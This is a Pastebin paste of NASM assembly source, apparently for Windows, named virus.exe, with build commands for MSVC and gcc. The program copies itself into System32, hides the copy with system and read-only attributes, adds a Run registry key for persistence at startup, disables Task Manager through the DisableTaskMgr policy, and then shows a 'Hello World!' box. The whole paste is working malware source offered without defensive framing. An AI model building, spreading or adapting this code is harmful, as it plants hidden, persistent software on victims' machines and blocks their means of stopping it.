Advertisement
FlyFar

virus.asm

Mar 14th, 2023
1,142
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 3.58 KB | Cybersecurity | 0 0
  1. ; 1. get libs form MS SDK or MASM32 package
  2. ; 2. nasm virus.asm -fwin32
  3.  
  4. ; 3. a) msvc:
  5. ; link.exe virus.obj "%LIBPATH%\kernel32.lib" "%LIBPATH%\user32.lib" "%LIBPATH%\advapi32.lib" /ENTRY:main /SUBSYSTEM:WINDOWS
  6.  
  7. ; 3. b) cygwin/gcc:
  8. ; gcc virus.obj "$LIBPATH/kernel32.lib" "$LIBPATH/user32.lib" "$LIBPATH/advapi32.lib" -mwindows -nostdlib -Xlinker -e_main -s -o virus.exe
  9.  
  10. section .data    data  align=4   ;read/write
  11.  
  12. Key_Value  dd 0x01
  13. Virus_Name  dd "\virus.exe",0x00
  14. length equ $-Virus_Name
  15. Reg_Name  dd "Virus",0x00
  16. Run dd "Software\Microsoft\Windows\CurrentVersion\Run",0x00
  17. Task_Man  dd "Software\Microsoft\Windows\CurrentVersion\Policies\System",0x00
  18. Task_Man_Key dd "disabletaskmgr",0x00
  19. szTitle   dd  "Virus:",0x00
  20. szText   dd  "Hello World!",0x00
  21.  
  22.  
  23. section .bss      bss   align=4  ;read/write
  24.  
  25. Virus_Handle resd 1
  26. Key_Handle  resd 1
  27. String_Length resd 1
  28. Virus_Path resb 260
  29. Sys_Dir resb 260
  30.  
  31.  
  32. ;section .rdata rdata align=4    ;read
  33.  
  34. section .text     code  align=16    ;read/execute
  35.  
  36. global _main
  37.  
  38. ;kernel32.dll
  39. extern __imp__ExitProcess@4
  40. extern __imp__GetModuleHandleA@4
  41. extern __imp__GetModuleFileNameA@12
  42. extern __imp__GetSystemDirectoryA@8
  43. extern __imp__CopyFileA@12
  44. extern __imp__SetFileAttributesA@8
  45.  
  46. ;user32.dll
  47. extern __imp__MessageBoxA@16
  48.  
  49. ;advapi32.dll
  50. extern __imp__RegCreateKeyExA@36
  51. extern __imp__RegOpenKeyExA@20
  52. extern __imp__RegSetValueExA@24
  53. extern __imp__RegCloseKey@4
  54.  
  55. section .code USE32
  56. _main:
  57.  
  58.     push 0x00
  59.     call [__imp__GetModuleHandleA@4]
  60.     mov  [Virus_Handle],eax  ;Get Handle of virus
  61.  
  62.     push 0x0104                ;MAX_PATH
  63.     push Virus_Path
  64.     push dword [Virus_Handle]
  65.     call [__imp__GetModuleFileNameA@12] ;Get path of virus
  66.  
  67.     push 0x0104                   ;MAX_PATH
  68.     push Sys_Dir
  69.     call [__imp__GetSystemDirectoryA@8] ;Find System32
  70.  
  71.     mov  edi,Sys_Dir
  72.     add  edi,eax
  73.     mov  esi,Virus_Name
  74.     mov ecx, length
  75.     cld
  76.     repe  movsb  ;Append virus name to system32 path
  77.  
  78.     push 0x00
  79.     push Sys_Dir
  80.     push Virus_Path
  81.     call [__imp__CopyFileA@12]  ;Copy Virus
  82.  
  83.     push 0x20|0x02|0x01|0x04 ;FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM
  84.     push Sys_Dir
  85.     call [__imp__SetFileAttributesA@8] ;Set virus attributes
  86.  
  87.     push Key_Handle
  88.     push 0x0002 ;KEY_SET_VALUE
  89.     push 0x00
  90.     push Run
  91.     push 0x80000002 ;HKEY_LOCAL_MACHINE
  92.     call [__imp__RegOpenKeyExA@20]   ;Open Run key
  93.  
  94.     mov  edi,Sys_Dir    ;Calculate size of string and store in ECX
  95.     mov ecx,-1
  96.     xor al,al
  97.      
  98.     repne scasb
  99.     sub edi,Sys_Dir
  100.  
  101.     push edi
  102.     push Sys_Dir
  103.     push 0x01
  104.     push 0x00
  105.     push Reg_Name
  106.     push dword [Key_Handle]
  107.     call [__imp__RegSetValueExA@24]  ;Set registry value
  108.  
  109.     push dword [Key_Handle]
  110.     call [__imp__RegCloseKey@4]
  111.  
  112.     xor  eax,eax
  113.     mov  dword [Key_Handle],eax ;Clear Key handle
  114.      
  115.     push 0x00
  116.     push Key_Handle
  117.     push 0x00
  118.     push 0x20006 ;KEY_WRITE
  119.     push 0x00
  120.     push 0x00
  121.     push 0x00
  122.     push Task_Man
  123.     push 0x80000001 ;HKEY_CURRENT_USER
  124.     call [__imp__RegCreateKeyExA@36]
  125.     push 0x04
  126.     push Key_Value
  127.     push 0x04 ;REG_DWORD
  128.     push 0x00
  129.     push Task_Man_Key
  130.     push dword [Key_Handle]
  131.     call [__imp__RegSetValueExA@24]  ;Disable taskmanager
  132.     push dword [Key_Handle]
  133.     call [__imp__RegCloseKey@4]
  134.  
  135.     push 0x00|0x40 ;MB_OK|MB_ICONINFORMATION
  136.     push szTitle
  137.     push szText
  138.     push 0x00
  139.     call [__imp__MessageBoxA@16]   ;Popup Info box
  140.  
  141.     push 0x00
  142.     call [__imp__ExitProcess@4]   ;Exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement